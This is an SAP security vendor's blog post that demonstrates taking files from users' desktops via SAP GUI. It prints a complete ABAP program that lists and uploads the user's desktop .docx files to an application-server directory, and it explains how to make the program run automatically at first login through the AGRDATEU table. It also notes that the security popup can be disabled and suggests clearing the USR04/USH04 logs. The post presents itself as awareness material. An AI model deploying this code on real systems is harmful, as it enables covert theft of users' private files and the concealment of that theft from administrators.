Logo
Sign In
SAP GUI

Getting Files from Local PC via SAP GUI with Illegal Methods

Learn how to retrieve local files from a user's desktop using SAP GUI in SAP systems and understand the potential security risks involved.
Defencemore TeamDefencemore Team

Introduction

In this blog post, we will demonstrate how to retrieve local files from a user's desktop via SAP GUI in SAP systems. The method involves creating an ABAP program that runs upon the user's first login and moves selected files to a local server. This technique highlights potential security vulnerabilities that SAP system administrators and security experts should be aware of.

Step-by-Step Guide

Creating the ABAP Program

First, we create an ABAP program in the SAP system to be connected. Below is the program code:

REPORT ZFILE_DOWNLOAD_TO_SERVER_3.

DATA: lv_filename TYPE string,
      file_content TYPE string,
      lv_file_line TYPE string,
      lt_file_data TYPE TABLE OF string.

DATA: filename LIKE rlgrap-filename,
      directory LIKE bdschko16-target_dir,
      itab_dir LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      dstpath LIKE draw-filep.

directory = 'C:\Users\burha\OneDrive\Desktop\'.
" You can use %UserProfile%\Desktop instead of static

dstpath = '/usr/sap/trans/tmp/new_dir/'.
" Chose this directory for easier access to files imported from the local PC

CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
  EXPORTING
    directory = directory
    FILTER = '*.docx'
  TABLES
    file_table = itab_file
    dir_table = itab_dir.

IF sy-subrc <> 0.
  " Error handling
ENDIF.

LOOP AT itab_file.
  CALL FUNCTION 'GUI_UPLOAD'
    EXPORTING
      filename = directory && itab_file-pathname
      filetype = 'ASC'
    TABLES
      data_tab = lt_file_data
    EXCEPTIONS
      file_open_error = 1
      file_read_error = 2
      no_batch = 3
      gui_refuse_filetransfer = 4
      invalid_type = 5
      no_authority = 6
      unknown_error = 7
      bad_data_format = 8
      header_not_allowed = 9
      separator_not_allowed = 10
      header_too_long = 11
      unknown_dp_error = 12
      access_denied = 13
      dp_out_of_memory = 14
      disk_full = 15
      dp_timeout = 16
      not_supported_by_gui = 17
      error_no_gui = 18
      OTHERS = 19.

  IF sy-subrc <> 0.
    MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgno
      WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4.
    EXIT.
  ENDIF.

  DATA: lv_server_dest TYPE string.
  lv_server_dest = dstpath && itab_file-pathname.

  OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
  IF sy-subrc <> 0.
    RAISE FILE_OPEN_ERROR.
  ENDIF.

  LOOP AT lt_file_data INTO lv_file_line.
    TRANSFER lv_file_line TO lv_server_dest.
  ENDLOOP.

  CLOSE DATASET lv_filename.
ENDLOOP.

" Clear history after execution
" Logs tables: USR04 VE USH04

Linking the Program to a Transaction Code

Now let's link the file we created to a tcode. For this, we create a new transaction code using the tcode SE93.

Transaction Code Creation

Adding a Row to AGRDATEU Table

Now that we have our tcode, we add a new row to the AGRDATEU table for this program to run the first time the user logs into the system.

AGRDATEU Table

Filtering Files for Download

The files will be selected according to the filter we provide in the ABAP program code and registered in the /usr/sap/trans/tmp/new_dir folder of the server.

File Filter

Security Popup on Login

When the user logs in to the system, the security popup for the file download will be active. This confirmation can be overlooked by careless users. In addition, if desired, it can be changed from the SAP GUI settings or from the registry root of the current computer.

Security Popup

Viewing the Downloaded File

Then, you can see this local file in the application server directory.

Local File on Server

SAP GUI Security Settings

SAP GUI security settings did not perform this check before version 7.20. However, after 7.20, the permission section for file upload and download operations has been improved.

SAP GUI Security Settings

Conclusion

Although this vulnerability is unlikely to be exploited, it is important for SAP system administrators to be aware of such methods and take preventive measures. DefenceMore's One Click Audit for SAP can help protect your systems from such attacks.

Contact us to learn more and schedule a free demo of our product that detects security vulnerabilities in SAP systems. Ensure your systems are not only functional but also secure.

ALL BLOG POSTS

A collection of articles, tutorials, and news about DefenceMore, SAP and security.

Aug 21, 2024
Authorization Objects

Authorization Objects in SAP Systems

Explore the importance of authorization objects in SAP systems and understand the critical tables that play a key role in SAP security.

May 12, 2024
SAP GUI

SAP GUI Versions From a Security Perspective

Understand the importance of keeping SAP GUI versions updated for security and how to plan upgrades effectively.

Apr 5, 2024
System Parameters

The Concept of Parameters in SAP Systems

Understand the different types of profile files and system parameters in SAP systems, and learn how DefenceMore's One Click Audit can help ensure their security.

Feb 16, 2024
SAP CryptoLib

Critical SAP Vulnerability: CVE-2023-40309

Learn about the critical CVE-2023-40309 vulnerability in SAP systems, its impact, and the corrective steps to secure your environment.

Nov 21, 2023
Code Inspection

Are Your Systems Really Secure?

Discover the vulnerabilities in your SAP systems and learn about DefenceMore's One Click Audit for SAP Systems.